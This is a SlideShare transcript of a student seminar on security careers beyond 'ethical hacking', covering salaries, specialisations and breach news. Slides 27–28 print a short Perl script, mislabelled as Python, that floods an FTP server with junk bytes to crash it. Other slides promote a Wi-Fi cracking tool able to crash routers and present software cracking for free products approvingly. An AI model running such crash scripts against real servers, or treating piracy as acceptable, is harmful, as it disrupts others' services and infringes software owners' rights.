Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Upcoming SlideShare
Loading in...5
×

Like this? Share it with your network

Share

Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

  • 1,116 views
Uploaded on

Presentation on topics beyond the conventional ethical hacking , discusses job factors and scope in the security field :) this was presented in LPU (Lovely Professional University) as a Seminar......

Presentation on topics beyond the conventional ethical hacking , discusses job factors and scope in the security field :) this was presented in LPU (Lovely Professional University) as a Seminar with attendees over 200. Meet m e at FB if u want it fb/nipun.jaswal

More in: Education , Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
1,116
On Slideshare
1,107
From Embeds
9
Number of Embeds
3

Actions

Shares
Downloads
46
Comments
0
Likes
3

Embeds 9

http://www.linkedin.com 4
https://www.linkedin.com 3
http://192.168.6.179 2

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Life Beyond Ethical Hacking“ The Actual Information Security” By :-Nipun Jaswal (CSA , HCF Info sec Pvt. Ltd. )
  • 2. Acknowledgements Dr. H.S Johal Ms. Himanshi
  • 3. Lil About My Self Certified With C|EH , CISE , AFCEH Associated With over 9 Companies Ambassador , EC-COUNCIL Creator Of India’s Fist DLP on Web Application Penetration Testing Course Student @ LPU  Tested Over 90+ Servers Currently working as Chief Security Analyst at HCF Infosec Pvt. Ltd
  • 4. Lets Go Old School ,What is EthicalHacking? Breaking Into Devices , Networks Legally. Securing Servers, Recovering Emails etc. But the Question Remains ! Where to get these jobs ?
  • 5. Jobs And Stats
  • 6. Why More Jobs and Less People ? Emerging Technology Still Register Work Don’t want to spend money Find it too difficult People Feel they can learn hacking in 2 days workshop :-P No Proper facilities of required courses
  • 7. Salary Packages Normal B.tech : 300K-400K BPO : 100K-250K DEVELOPMENT : 300K-700K SECURITY : 600K-1300K
  • 8. Beyond So Called “Ethical Hacking” Web Application Penetration testing Exploit Writing Reverse Engineering Malware Analysis Computer Forensics Protocol Analysis
  • 9. Why To Go Beyond Ethical Hacking? Jobs For Ethical Hacker:- Trainer Trainer Trainer Trainer And Trainer Salary Around : 15K + Incentives
  • 10. Jobs Beyond Ethical Hacking:- Jobs For Hackers:- Researchers Technical Heads Penetration testers Forensic Investigators Salary Around: 300-400K Per Month 
  • 11. Benefits  of not Being a Hacker
  • 12. Benefits  of Being a Hacker I M UR WORST NIGHTMARE :-P
  • 13. How To Let Your Dreams Come True? Some Highly Paid Fields :- WAPT – Involves Testing of Web Applications , Websites , Servers , Source code Auditing . Exploit Writing – Finding Vulnerabilities in soft wares and Possibly to Exploit the Software . Reverse Engineering :- Software cracking , Patches , Modifying Features of an end product
  • 14. How To Let Your Dreams Come True? Some Highly Paid Fields :- Wireless Testing :- Involves Network Security infrastructure build up , Managing Networks , System Administration etc. Projects :- Good At Coding? Show to the whole world . Forensics : Highest Paid Job in the entire list  Takes A lot , And Pays A lot
  • 15. Why We Need More People ? Source: Indian Express
  • 16. Why We Need More People ? Source: Times Of India
  • 17. Host Gator Hacked !! 3 Lac Websites Owned By Hackers Source: SoftPedia
  • 18. Host Gator Hacked !! 3 Lac Websites Owned By Hackers Contd.. Source: Private
  • 19. Norton India Hacked !! Source: Private
  • 20. Norton India’s Database Hacked !! Source: Private
  • 21. Norton India’s Database Hacked !! Source: Private
  • 22. The Biggest Of All… Anonymous!! Source: National Post
  • 23. Now Beyond The Word ‘Ethical’ Web Application Penetration Testing :-• Find Bugs In Web Applications – Custom Made , Open Source Applications .• Bugs which may compromise the security , make it vulnerable , helps an attacker to steal sensitive information• Now How To Perform 1 Out of 300 Tests In Web Applications Pen- Test?• Lets See a Simple Example – SQL Injection Bypass
  • 24. Rise Of The Web Applications
  • 25. Fasten Your Seat Belts , Its Showtime DEMO
  • 26. Now Beyond The Word ‘Ethical’ Exploit Writing• Potentially writing codes to exploit a vulnerability .• Highly Paid in Soft wares are vulnerable to Exploits , which further may lead to compromise of the entire system.• Requirement : C,C++, Perl , Python , Ruby , Assembly language
  • 27. Now Beyond The Word ‘Ethical’ Simplest of The Exploit in Python- Crashing A Secure Port FTP Serveruse strict;use Socket;my $junk = "x41" x1000;my $host = shift || ‘192.168.15.1;my $port = shift || 200;my $proto = getprotobyname(tcp);my $iaddr = inet_aton($host);my $paddr = sockaddr_in($port, $iaddr);print "[+] Setting up socketn";socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";print "[+] Connecting to $host on port $portn";connect(SOCKET, $paddr) or die "connect: $!";print "[+] Sending payloadn";print SOCKET $junk."n";print "[+] Payload sentn";close SOCKET or die "close: $!";
  • 28. Now Beyond The Word ‘Ethical’ Simplest of The Exploit in Python- Crashing A Secure Port FTP Serveruse strict;use Socket;my $junk = "x41" x1000;my $host = shift || ‘192.168.15.1;my $port = shift || 200;my $proto = getprotobyname(tcp);my $iaddr = inet_aton($host);my $paddr = sockaddr_in($port, $iaddr);print "[+] Setting up socketn";socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";print "[+] Connecting to $host on port $portn";connect(SOCKET, $paddr) or die "connect: $!";print "[+] Sending payloadn";print SOCKET $junk."n";print "[+] Payload sentn";close SOCKET or die "close: $!";
  • 29. Now Beyond The Word ‘Ethical’ Prices for Various Exploits
  • 30. Now Beyond The Word ‘Ethical’ Reverse Engineering• Editing the final software to find serials keys , stop the online authentications ,• Mostly used by pirates• Sometimes used to edit the features of a final software• Make your Life easier with free products 
  • 31. Now Beyond The Word ‘Ethical’ Wireless Penetration Testing• Involves Auditing of Network Security Over Wireless• Installation of Servers And Security Devices• Crack proofing Wireless Passwords• Highly paid• Requires Networking Background
  • 32. INSANITY WIFI CRACKER Insanity Wi-fi Cracker• Developed By me and my Friends for minor project• Automates the cracking of various wifi securities• Performs self MITM attack• DOS Service Can Crash the Routers For Ever :-P• Even an 8 Years old can press the button ‘c’ for cracking and no. for a particular AP to crack
  • 33. Wi-fi Cracking At a Click Of a Button DEMO
  • 34. So A One Last Question , Wanna go this ?
  • 35. Or Wanna Go This ?
  • 36. After AllIt’s your Career |Handle it with care|
  • 37. Any Questions ?
  • 38. ContactEmail :info@nipunjaswal.comwww.nipunjaswal.comwww.facebook.com/nipun.jaswalwww.hatcon.inwww.hcf.co.inwww.starthack.comwww.cyber-rog.com/h3llwww.pentest.co.in